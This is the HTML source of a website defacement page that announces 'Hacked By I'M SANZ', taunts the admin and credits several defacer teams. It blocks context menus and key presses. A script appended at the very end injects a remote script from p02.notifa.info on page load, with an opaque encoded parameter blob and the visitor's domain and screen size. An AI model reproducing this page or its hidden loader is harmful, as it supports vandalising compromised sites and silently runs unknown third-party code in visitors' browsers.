



<!doctype html> 
<html lang="en-US" oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;"> 
<head> 
<meta charset="UTF-8"> 	<meta name="robots" content="index, follow"/> 	
<meta name="rating" content="General"/> 	
<meta name="classification" content="Hacked"/> 	<meta name="keyword" content=" Harakiri Cyber Team"/> 	
<meta name="description" content="I'M SANZ in your Sistem"/> 	
<meta name="googlebot" content="index,follow"/> 	<meta name="robots" content="all"/> 	
<meta name="robots schedule" content="auto"/> 	<meta name="distribution" content="global"/> 	<base target="_blank"/> 	
<meta name="Author" content="Forhad Haxor"> 

<title>[+] Hacked By I'M SANZ [+]</title> 

<meta http-equiv="imagetoolbar" content="no"> 	<link href="https://fonts.googleapis.com/css?family=Iceland" rel="stylesheet"> 


<script> alert(" [+] I'M SANZ WAS HERE [+]")</script>
<script>

       var button = document.getElementById("button");
       function playBack() {
           button.addEventListener("click", function (){
            var talk = Prompt("If you wish for the AI to respond type hi");
            var myAudio = document.getElementById("myAudio");

            if(talk === "hi") {
                    myAudio.play();
            }
           }) ;



       }
       playBack();
</script>

<style> 
@-moz-keyframes roll { 100% { -moz-transform: rotate(14400deg); } }
@-o-keyframes roll { 100% { -o-transform: rotate(14400deg); } }
@-webkit-keyframes roll { 100% { -webkit-transform: rotate(14400deg); } }

body{-moz-animation-name: roll;
-moz-animation-duration: 6s;
-moz-animation-iteration-count: 1;
-o-animation-name: roll;
-o-animation-duration: 7s;
-o-animation-iteration-count: 1;
-webkit-animation-name: roll;
-webkit-animation-duration: 4s;
-webkit-animation-iteration-count: 1;}




#topnav{
background-color:blue;
clear:both;
}

#topnav ul{
border-bottom:1px;  #999 solid:border-top:1px; #000 solid;margin:20px 0; padding:10px 0;
text-align:left;
font-family: Iceland; 		
}

#topnav ul li{

display:inline;
}

#topnav ul li a{

padding:0 10px; text-decoration:none;

}

#topnav a:link{

color:#ffffff;
font-width:regular;
font-size:50px;
}


#topnav a:visited{ 
color:white;

}

#topnav ul li a:hover{
background:url('bor.jpg') color:#996666;

}

#about{ 
font-family: Iceland;

}



body{
background: url(http://ip-fisher.freeiz.com/images/background.jpg) no-repeat center center fixed; 
-webkit-background-size: cover; 		
-moz-background-size: cover; 		
-o-background-size: cover; 		
background-size: cover; 
background-color:black;
} 	

#marquee{
font-family: cursive;
}


.title { 
font-family: Iceland; 		
color: white; 		
font-size: 80px; 		
text-shadow: 0px 0px 15px #00ff00; 
} 	

.team { 		
font-family: Iceland; 		
color: white; 		
font-size: 45px; 		
text-shadow: 0px 0px 15px red; 		
margin: 0px 0px 9px 0px;
} 	

.team1 { 
font-family: Iceland; 		
color: #19FF8F; 		
font-size: 40px; 		
text-shadow: 0px 0px 15px #00ff00; 		
margin: 0px 0px 9px 0px; 
background-color:red;
} 	 		


footer { 
position: fixed; 		
bottom: 10px; 		
text-align: center; 		 			
text-shadow: 0px 0px 25px red; 	
}

 .top { 		
font-family: Iceland; 		
color: red; 		
font-size: 25px; 		
text-shadow: 0px 0px 15px #33E6FF; 		
margin: 0px 0px 9px 0px; 

} 		 		

body{ 	cursor: url("http://hellox.persiangig.com/DefacePage/negro.cur"), auto; 

}

#button {
            border: 1px white;
            border-radius: 10px;
            font-size: 22px;
            height:65px;
            width:100px;
            text-align: center;
            line-height: 65px;
        }
    </style>



</head>



<body oncontextmenu="return false" class="noselect"> 
<div id="marquee">
<marquee behavior="alternate" scrollamount="15" scrolldelay="150"  width="100%"><font size="6pt" class="asu" color="#00ff00" style="text-shadow: 2px 5px 5px black, 1px 2px 2px black, 2px 2px 10px black;"><blink> [+] Hello Admin [+] </blink></font></marquee> 

 </div>
<center><img src="https://i.ibb.co/51vCgGd/images-3.jpg" width="460" height="450"></center>

 <center><span class="title"> I'M SANZ HERE </span><br> <img src="https://i.ibb.co/5kDmRZL/images-3.jpg" width="40" height="30"/><span class="team"> H.C.T [OFC] </span><img src="https://i.ibb.co/5kDmRZL/images-3.jpg" width="40" height="30"/></center> 


<div id="about">
<center>
<h3> 
<font size="6pt" class="asu" color="white" style="text-shadow: 2px 5px 5px blue, 1px 2px 2px blue, 2px 2px 10px blue;"><font color="red">Dear Admin </font><br>
I'M just kidding with your sistem<br> & Just want to tell you for patch<br>your security sistem!! <br> <<<<+<font color="red"><marquee width="55%">see you admin</marquee> </font>+>>>>
</font>
</h3>
</center>
  </div>


 <center>

     <!-- button -->


<!-- <div id="topnav">
<ul id="nav">
<li>
<a href="https://facebook.com/" target="_blank">Facebook |</a>
</li>

<li>
<a href="#" target="_blank">Twitter |</a>
</li>

<li>
<a href="http://zone-h.com/archive/notifier=BANGLADESH%20CYBER%20GHO5T" target="_blank">Def.ID|</a>
</li>

<li>
<a href="https://facebook.com/BangladeshCyberGho5t" target="_blank"> Our Team |</a>
</li>
</ul>
</div>
-->
<center>
<iframe src="http://www.facebook.com/plugins/likebox.php?href=https%3A%2F%2Fhttps://facebook.com/farhadr230&width=292&height=290&colorscheme=light&show_faces=true&border_color&stream=false&header=true" scrolling="no" frameborder="0" style="border:white; overflow:hidden; width:330px; height:245px;" allowTransparency="true">
</iframe>

    <div id="team">
    <audio controls="autoplay" src="https://c.top4top.io/m_1585p0c7q0.mp3" type="audio/mpeg"></audio>
</div>
</center>
     



<br><br> <footer><marquee> <font size="18" face="cursive" color="#00ff00"><font color="white"><center> Our Team </font> <font color="aqua">:- </font>  
<font color="red">H.C.T</font><font color="yellow">[OFC]</font> - <font color="red">T.C.T</font><font color="yellow">[OFC]</font> - <font color="red">P.C.T</font><font color="yellow">[OFC]</font> - <font color="red">M.A.T</font><font color="yellow">[OFC]</font>
</center>

<center><span class="top" >    
<span style="background-color:rgb(0,255, 0)"><font size="14" >Our Team Members:</font>  Alpin | XghostHunter| mr.down | Queen.Bee | JunedGans | All Defacer Indonesia  </span></marquee></span></center></footer><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p02.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXT%2bExZ8npXGYS7QHGqxhXrsOQZxPC0dYU%2fvR8vu%2bhqKFU8YTWpKDvXwP5dASibawSXKeo%2f1xKRoq8MZW0KRWaHsa1PkpXyfWmcDZVDGcbKG0mGhAXOvhX0vXWqNCby1gt5keprowuE31uybws6NF88i2mO1jhDDeaNbFStjcr%2bObASw4eNSjWckfqWq6BJWnFUBTpNDYBXlj8Wb%2fNoUNFXEN2SgrncwZfSDuRctupDqg5vjaxabSt9X2NGGbKWoSjWxihU3sVDJNp462zeE60a7xR4q6VGyaRiW6x0EPAo%2fAB%2b9AyHhgyu4YKOCTmwN8SRLbuUjVfEnJrG1SXTrbmn7UW6a3JwAfNedV%2fHbkzOuUtvQgx6EwUs0qYGqeLpiGdhfPP5s%2bE48yxp6NfJuWNEsIx1X%2f44UpGRa8jjCQiAdjFvl9z8FW4dHMgBoGqPr7gZTM6%2bZcrIKZtLHJeN%2bPSw1mgkuTEy1TZCaL9nTnVeKY%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body> </footer> </body> </html> </html>
